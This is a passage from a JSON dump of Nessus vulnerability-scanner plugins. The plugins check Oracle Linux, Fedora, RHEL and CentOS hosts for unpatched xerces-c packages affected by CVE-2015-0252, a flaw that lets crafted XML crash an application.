script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-c-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-c-devel-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-c-doc-3.1.1-7.el7_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-c / xerces-c-devel / xerces-c-doc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:52", "bulletinFamily": "scanner", "description": "Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-4251.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82436", "published": "2015-03-31T00:00:00", "title": "Fedora 21 : xerces-c-3.1.1-8.fc21 (2015-4251)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4251.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82436);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_xref(name:\"FEDORA\", value:\"2015-4251\");\n\n script_name(english:\"Fedora 21 : xerces-c-3.1.1-8.fc21 (2015-4251)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1199103\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153829.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d10b589b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-c package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"xerces-c-3.1.1-8.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-c\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:24:26", "bulletinFamily": "scanner", "description": "An updated xerces-c package that fixes one security issue is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nXerces-C is a validating XML parser written in a portable subset of C++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain XML documents. A remote attacker could provide specially crafted XML input that, when parsed by an application using Xerces-C, would cause that application to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package, which contains a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2015-1193.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84465", "published": "2015-06-30T00:00:00", "title": "RHEL 7 : xerces-c (RHSA-2015:1193)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1193. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84465);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"RHSA\", value:\"2015:1193\");\n\n script_name(english:\"RHEL 7 : xerces-c (RHSA-2015:1193)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated xerces-c package that fixes one security issue is now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nXerces-C is a validating XML parser written in a portable subset of\nC++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain\nXML documents. A remote attacker could provide specially crafted XML\ninput that, when parsed by an application using Xerces-C, would cause\nthat application to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package,\nwhich contains a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0252\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-c-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-c-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-c-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1193\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-c-3.1.1-7.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-c-debuginfo-3.1.1-7.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-c-devel-3.1.1-7.el7_1\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xerces-c-doc-3.1.1-7.el7_1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-c / xerces-c-debuginfo / xerces-c-devel / xerces-c-doc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:52", "bulletinFamily": "scanner", "description": "Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-4285.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82437", "published": "2015-03-31T00:00:00", "title": "Fedora 20 : xerces-c-3.1.1-6.fc20 (2015-4285)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4285.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82437);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"FEDORA\", value:\"2015-4285\");\n\n script_name(english:\"Fedora 20 : xerces-c-3.1.1-6.fc20 (2015-4285)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1199103\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153923.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8dfccaff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-c package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"xerces-c-3.1.1-6.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-c\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:24:26", "bulletinFamily": "scanner", "description": "An updated xerces-c package that fixes one security issue is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nXerces-C is a validating XML parser written in a portable subset of C++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain XML documents. A remote attacker could provide specially crafted XML input that, when parsed by an application using Xerces-C, would cause that application to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package, which contains a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2015-1193.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84445", "published": "2015-06-30T00:00:00", "title": "CentOS 7 : xerces-c (CESA-2015:1193)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1193 and \n# CentOS Errata and Security Advisory 2015:1193 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84445);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"RHSA\", value:\"2015:1193\");\n\n script_name(english:\"CentOS 7 : xerces-c (CESA-2015:1193)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated xerces-c package that fixes one security issue is now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nXerces-C is a validating XML parser written in a portable subset of\nC++.\n\nA flaw was found in the way the Xerces-C XML parser processed certain\nXML documents. A remote attacker could provide specially crafted XML\ninput that, when parsed by an application using Xerces-C, would cause\nthat application to crash. (CVE-2015-0252)\n\nAll xerces-c users are advised to upgrade to this updated package,\nwhich contains a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021228.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?19d44b92\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-c packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xerces-c-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:xerces-c-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"xerces-c-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"xerces-c-devel-3.1.1-7.el7_1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"xerces-c-doc-3.1.1-7.el7_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:52", "bulletinFamily": "scanner", "description": "Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-4228.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82434", "published": "2015-03-31T00:00:00", "title": "Fedora 20 : mingw-xerces-c-3.1.1-9.fc20 (2015-4228)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4228.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82434);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0252\");\n script_bugtraq_id(73252);\n script_xref(name:\"FEDORA\", value:\"2015-4228\");\n\n script_name(english:\"Fedora 20 : mingw-xerces-c-3.1.1-9.fc20 (2015-4228)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1199103\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153887.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46729a4f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-xerces-c package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-xerces-c\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mingw-xerces-c-3.1.1-9.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-xerces-c\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:52", "bulletinFamily": "scanner", "description": "Security fix for CVE-2015-0252.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2015-4321.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82439", "published": "2015-03-31T00:00:00", "title": "Fedora 21 : mingw-xerces-c-3.1.1-11.fc21 (2015-4321)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted 